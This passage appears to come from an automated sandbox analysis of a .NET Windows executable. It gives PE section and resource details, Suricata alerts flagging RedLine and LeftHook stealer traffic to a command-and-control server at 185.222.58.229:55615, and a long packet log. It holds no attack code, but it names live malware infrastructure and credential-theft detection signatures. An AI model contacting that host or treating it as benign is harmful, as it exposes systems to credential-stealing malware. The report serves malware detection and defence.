IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xae000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa9938	0xa9a00	bac8a1e7bc489f2e0005570bdabf4928	False	0.9085240880619012	OpenPGP Secret Key	7.7812990489221505	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xac000	0x1c34	0x1e00	38d97f655cb85553542aac2f2dfac9f8	False	0.735546875	data	7.1384386010133545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xae000	0xc	0x200	bed2e9ae42d85a05c94d082240b829af	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xac160	0x151a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8863383931877082
RT_GROUP_ICON	0xad67c	0x14	data	0.9
RT_GROUP_ICON	0xad690	0x14	data	1.05
RT_VERSION	0xad6a4	0x3a4	data	0.4356223175965665
RT_MANIFEST	0xada48	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-03T13:27:02.233306+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49733	185.222.58.229	55615	TCP
2024-12-03T13:27:07.671218+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	185.222.58.229	55615	192.168.2.4	49733	TCP
2024-12-03T13:27:08.330742+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49733	185.222.58.229	55615	TCP
2024-12-03T13:27:12.660613+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	185.222.58.229	55615	192.168.2.4	49733	TCP
2024-12-03T13:27:13.296696+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49737	185.222.58.229	55615	TCP
2024-12-03T13:27:16.296702+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.4	49739	185.222.58.229	55615	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 13:27:00.775446892 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:00.896859884 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:00.896964073 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:00.911386967 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:01.031485081 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:01.264681101 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:01.385394096 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:02.182149887 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:02.233305931 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:02.425539017 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:02.467581987 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:07.551135063 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:07.671217918 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:07.905309916 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:07.951133013 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:08.003767014 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:08.026439905 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:08.330627918 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:08.330652952 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:08.330666065 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:08.330677032 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:08.330688953 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:08.330741882 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:08.373940945 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:08.407663107 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:08.407725096 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:08.407788992 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:08.411685944 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:08.451945066 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:12.540045977 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:12.540560007 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:12.660613060 CET	55615	49733	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:12.660650015 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:12.660723925 CET	49733	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:12.661187887 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:12.661587954 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:12.782105923 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.014784098 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.135564089 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.135579109 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.135597944 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.135606050 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.135623932 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.135632038 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.135637999 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.135677099 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.135709047 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.135710955 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.135720968 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.135757923 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.135792017 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.135971069 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.136023998 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.255831957 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.255848885 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.255867004 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.255875111 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.255907059 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.255914927 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.255947113 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.255959034 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.296600103 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.296695948 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.416506052 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.416630983 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.460457087 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.460514069 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.580476999 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.580563068 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.627851963 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.628011942 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.700598955 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.700664043 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748239040 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748262882 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748271942 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748280048 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748291969 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748318911 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748331070 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748372078 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748388052 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748405933 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748476982 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748486996 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748497009 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748534918 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748543024 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748568058 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748584986 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748603106 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748611927 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748658895 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748675108 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748728991 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748755932 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748872042 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.748918056 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.748975992 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749020100 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.749021053 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749106884 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749155998 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.749181986 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749206066 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749257088 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.749267101 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749309063 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.749378920 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749489069 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749526024 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.749541998 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.749552011 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749567986 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749630928 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749670029 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.749674082 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749689102 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.749753952 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.749932051 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749953985 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749962091 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.749973059 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.749990940 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.750021935 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.750046015 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.750088930 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.820794106 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.821670055 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.868621111 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.868706942 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869149923 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869221926 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869338989 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869349003 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869358063 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869376898 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869385004 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869396925 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869400024 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869415998 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869426012 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869446993 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869477987 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869525909 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869535923 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869549036 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869559050 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869569063 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869573116 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869591951 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869595051 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869620085 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869647980 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869649887 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869659901 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869690895 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869786024 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869796038 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869805098 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869822025 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869831085 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869832993 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869862080 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869882107 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.869891882 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869901896 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.869971037 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870009899 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870028973 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870054960 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870055914 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870064974 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870075941 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870094061 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870110035 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870126963 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870136023 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870176077 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870208979 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870244980 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870253086 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870338917 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870368958 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870378971 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870414972 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870415926 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870424032 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870460033 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870503902 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870513916 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870527983 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870556116 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870568991 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870572090 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870589018 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870615959 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870618105 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870626926 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870656013 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870686054 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870707035 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870728970 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870748043 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870770931 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870786905 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870826960 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.870902061 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870913029 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.870949030 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.941888094 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.941941023 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.941972017 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.942447901 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.988837957 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.988850117 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.988894939 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.988909006 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.988955021 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.988980055 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.988987923 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.988991976 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.989028931 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.989090919 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989100933 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989145041 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.989175081 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989420891 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989429951 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989476919 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.989487886 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989521980 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989537001 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.989553928 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.989667892 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989677906 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989722013 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.989752054 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989770889 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989809990 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.989923000 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.989962101 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990210056 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990217924 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990233898 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.990252972 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.990264893 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.990298986 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990339994 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990365982 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.990398884 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.990411997 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990432978 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990477085 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.990531921 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990674973 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990686893 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990708113 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990720034 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.990739107 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.990750074 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.990916014 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990926027 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990936995 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.990955114 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991007090 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.991064072 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991072893 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991152048 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.991189957 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991225958 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.991256952 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991266966 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991276979 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991331100 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.991385937 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991394997 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991467953 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991476059 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991518974 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.991585016 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991604090 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991621971 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.991645098 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.991719007 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991729021 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991780043 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.991808891 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991817951 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991869926 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991889000 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.991915941 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.991926908 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991936922 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.991978884 CET	55615	49737	185.222.58.229	192.168.2.4
